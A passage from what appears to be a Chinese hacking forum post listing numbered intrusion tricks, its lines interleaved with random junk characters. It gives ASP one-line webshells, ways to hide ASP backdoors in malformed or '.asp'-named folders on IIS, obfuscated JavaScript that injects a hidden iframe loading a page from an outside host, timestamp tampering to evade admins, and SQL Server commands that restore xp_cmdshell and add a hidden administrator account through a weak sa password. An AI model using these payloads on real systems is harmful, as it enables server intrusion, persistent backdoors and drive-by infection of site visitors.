d).<script language=VBScript runat=server>execute request("sb")</Script>
; V% x0 n5 m# q" m0 i- m; Te).<%25Execute(request("l"))%25>
6 G: v# E4 f5 k' Ef).<%if request("cmd")<>"" then execute request("pass")%>
. m& ]: J! |, A* g2 U- y9 a/ B9 G+ b8 B( p2 Y- l: g# v. }/ T
52、at "12:17" /interactive cmd
) O/ P( v6 @9 e执行后可以用AT命令查看新加的任务' E* Y' \& r. R3 |; I% P
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。. K: d4 F+ f' P% u* U
. ^" W( F7 G. v( ?5 {; c* [, H
53、隐藏ASP后门的两种方法( X2 v7 @& i- \5 U2 ?
1、建立非标准目录:mkdir images..\" s8 n) t6 B; |% B5 R6 Z( n- u
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
1 F: Q. N% a0 w. }通过web访问ASP木马:http://ip/images../news.asp?action=login
# a) a' N6 I4 l# P. O如何删除非标准目录:rmdir images..\ /s
# K2 D) ^- r1 f2 N( Y1 D" y- U2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:# I% T+ v# S% {2 c! t/ q/ z) n
mkdir programme.asp  U/ g+ x* C5 A% `6 [' [
新建1.txt文件内容:<!--#include file=”12.jpg”-->4 |% {- b7 S3 x' [8 x: H/ J6 N
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
8 f, g: @% q+ O! o+ c  Y. U% lattrib +H +S programme.asp. i& e' v! |  O- e9 }
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt0 @2 v5 `2 @. g- r" @  ~% o. e
$ B( e) O4 I+ Q" I" M
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。: L- K( C. ?+ l, s2 G; V
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
& T; E2 D! p4 Y7 a7 H
) i% U( V5 s3 ]& h* r1 s- T# Z! L55、JS隐蔽挂马3 B; P7 j  `! i7 ~6 w0 A; e* }
1.
: _& s  J1 f3 ^; \# E" A* {$ Xvar tr4c3="<iframe src=ht";
0 t( q/ L7 B0 q0 }1 g0 ~# str4c3 = tr4c3+"tp:/";" G1 j3 G& _* o! ]1 B: Q' Q; `
tr4c3 = tr4c3+"/ww";
6 k5 \; ~: z- F! x6 B" ~' F  ?# Ftr4c3 = tr4c3+"w.tr4";
/ c: d2 x/ n$ k6 R! P- X: ^tr4c3 = tr4c3+"c3.com/inc/m";6 F! {/ }) }7 S3 V. N7 \3 t' f
tr4c3 = tr4c3+"m.htm style="display:none"></i";4 b. D/ {, L% m  Y
tr4c3 =tr4c3+"frame>'";% c+ Y# t: k1 n( z- i- b; `3 q. Q
document.write(tr4c3);
2 p  J% r$ @1 |避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。% v' E* ^/ Z3 k+ F" P* u
8 ~3 p8 b2 M, C2 {" o
2.4 F4 B. q& Z# U" T1 k5 ]
转换进制,然后用EVAL执行。如
. F& e3 D% g5 ieval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");, g7 o5 ]$ S! Z5 z1 ]1 ]$ T- q
不过这个有点显眼。4 \! h; k' s. P6 e# b) d# [
3.
% c# _) O( [5 C7 sdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');- v8 ]4 e# r9 P6 Q3 Q
最后一点,别忘了把文件的时间也修改下。
5 g/ k4 o, L3 G; v" b, G& s
+ `' J! E: Y+ g* C' E' J56.3389终端入侵常用DOS命令
0 N& F2 e9 t$ x% a! L7 [taskkill taskkill /PID 1248 /t9 V# i5 D5 p) E( U+ T( Y

4 x7 \' q: U( |9 ^" G* Xtasklist 查进程
3 e7 E: F  Q8 H4 s6 }- P
- N% b' C9 H# L, zcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限+ @. ]) l7 x( L" I
iisreset /reboot
  u# l9 F& x7 ]9 K# |& g3 vtsshutdn /reboot /delay:1    重起服务器
) ]. r; l) t, `; h$ r! L& r8 [0 g4 L$ l, j
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,! _& [. y' o' L$ M" M( W0 g4 M

/ Q1 V) P( ~7 p, _4 {6 L: nquery user 查看当前终端用户在线情况
: U0 W% Q) z; K7 ^& i
9 \5 M# \5 v; R& }. o4 p要显示有关所有会话使用的进程的信息,请键入:query process *) _1 M6 c$ _6 T8 S
) u8 a6 W+ |# P) s8 j$ X9 r
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
  W- n2 T  b) p0 _0 D/ p' h' d2 D- S5 P
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER25 U# s, X$ _- ^0 S  m& z' V
9 X! m; I. A1 u
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
: m* l- N: |4 Q3 m  n5 n, K, T4 u2 _, O
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
4 A. P# _6 |; Y* ^9 g2 T8 n' U% @4 ^8 v2 p5 E) A! Q
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
+ p( F: ~8 a$ I4 q) B0 t# ?6 h3 t
. j' @8 |$ F& P. c命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。* y$ u/ Y4 P2 r) @) `7 d+ c' Y
1 a3 i9 }+ U+ H1 [* m* b) M2 u
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机4 G: a0 f% @$ I
  `8 z$ M* c; _( A$ x# j# X
56、在地址栏或按Ctrl+O,输入:3 Y( F  H( H1 S; O/ B" I( O" F6 n
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
* u6 a: G1 H6 @+ M  d/ e& Z% K* l( D6 f" T6 _: q% X9 j9 L
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。8 p6 p2 P5 C2 C3 b4 l

0 g, U4 O6 [- x/ x+ [; u/ o* W57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
8 C1 ~* |' M& E* f( x; R2 v用net localgroup administrators是可以看到管理组下,加了$的用户的。
: R% b  K2 V  \- s. A! Z
! W' n' K* e. k0 G7 S" `58、 sa弱口令相关命令; B2 N" m9 d) e7 C5 T. r
7 q! v+ J( @2 y- a- ^( W6 A
一.更改sa口令方法:* |4 A+ i, N" V" z$ q) [
用sql综合利用工具连接后,执行命令:& `+ z8 q- J  [! V1 x
exec sp_password NULL,'20001001','sa'+ h* l) i6 Y! Z% e
(提示:慎用!)& {. o2 S- }% o; u9 Q% D
, [6 L7 c4 S9 m7 ?# r" B" X9 U6 n
二.简单修补sa弱口令.5 u8 m6 d' A5 _  [+ `

0 }$ m) @5 |+ \/ U. [4 c7 y方法1:查询分离器连接后执行:
: t6 ]. C3 i* L! [9 ~if exists (select * from
% g) ?& F2 Z% v- ]5 V( a4 K3 Adbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and) ?2 U3 ~/ ?& `& E0 e$ q% S
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
8 v! j) u' ?8 L% j$ s) }& j7 g. B6 e. M
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'6 |9 ~( u" W+ U: V& D+ P

' ~2 U  `% z( CGO. U! E9 T; @7 S6 a( T. f

' u. ]  v& w- |8 q! Q& D2 ~2 Q0 c然后按F5键命令执行完毕( W/ R% c6 n/ r+ b/ {- o
' X: Z$ [+ A/ A: v: R8 y9 U: M- M
方法2:查询分离器连接后
8 U7 H" \3 L+ C! }第一步执行:use master
$ U  z( X1 ?6 u: B, |第二步执行:sp_dropextendedproc 'xp_cmdshell'
+ U& d! p- _& `" a7 B然后按F5键命令执行完毕
, D' ^8 P# m6 u  {) p
- m' A0 b" E/ N2 c3 z' O5 f0 i2 E! \- P* h8 J" Q
三.常见情况恢复执行xp_cmdshell.; k, _" I2 ~% I
# W9 B! y8 y5 l/ t, b; f& [5 p/ W
: L( D8 O. B, d5 r) M
1 未能找到存储过程'master..xpcmdshell'.) K+ K6 J4 a  v
   恢复方法:查询分离器连接后,7 d) \3 X8 \1 j! P$ }3 M
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
: r4 P( [) s' i" R第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'; H: A4 Q9 U* T3 `* \% F
然后按F5键命令执行完毕
1 g7 C% z4 K. F8 U1 E
+ E. b  ?, q7 c, Y5 F) A2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。): b+ e8 C1 e5 r: j( ?) x
恢复方法:查询分离器连接后,
4 B7 ]' |3 b7 h9 Y' n1 M第一步执行:sp_dropextendedproc "xp_cmdshell"7 q  C; h8 N4 E- w0 Q! }
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
: ]8 J' I5 M4 Z8 C9 G然后按F5键命令执行完毕
" e' R/ t* I# j4 I. G
; P& L3 T  h' Y- X2 ]3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)( B5 S: c$ K5 a- ]
恢复方法:查询分离器连接后,# s5 W' ]2 ]& z3 Y9 s
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'+ p; P' E, p: [2 u
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
- g! n* |5 C+ f$ n3 y3 a# Q然后按F5键命令执行完毕
9 o( K! k; G, h; w, ~; g0 _1 e1 I0 N
四.终极方法.
7 f" a, S. @' w8 s/ f如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
& N  S  t% |8 b' f) }5 R查询分离器连接后,6 a. q7 N5 e, @+ X) _  F, A3 ~4 k' p, S8 k
2000servser系统:2 m8 z7 v3 J5 }6 o+ m
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'# {5 n- R  F" G1 X6 Y, H" x+ D

" L# O0 ?. S+ I* E- s; ?) X: Xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
7 I: \; W) O& f3 ^4 y& M, _2 v8 G% A" W( G
xp或2003server系统:
' l# x, N# e; T0 Q2 }6 V& H2 \% o, w0 [
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'/ s6 H4 n5 c" _! n/ X% S
* P; K* H9 t$ K* @: T: \" I5 W3 k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
" I# j, M: A/ }4 u" Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表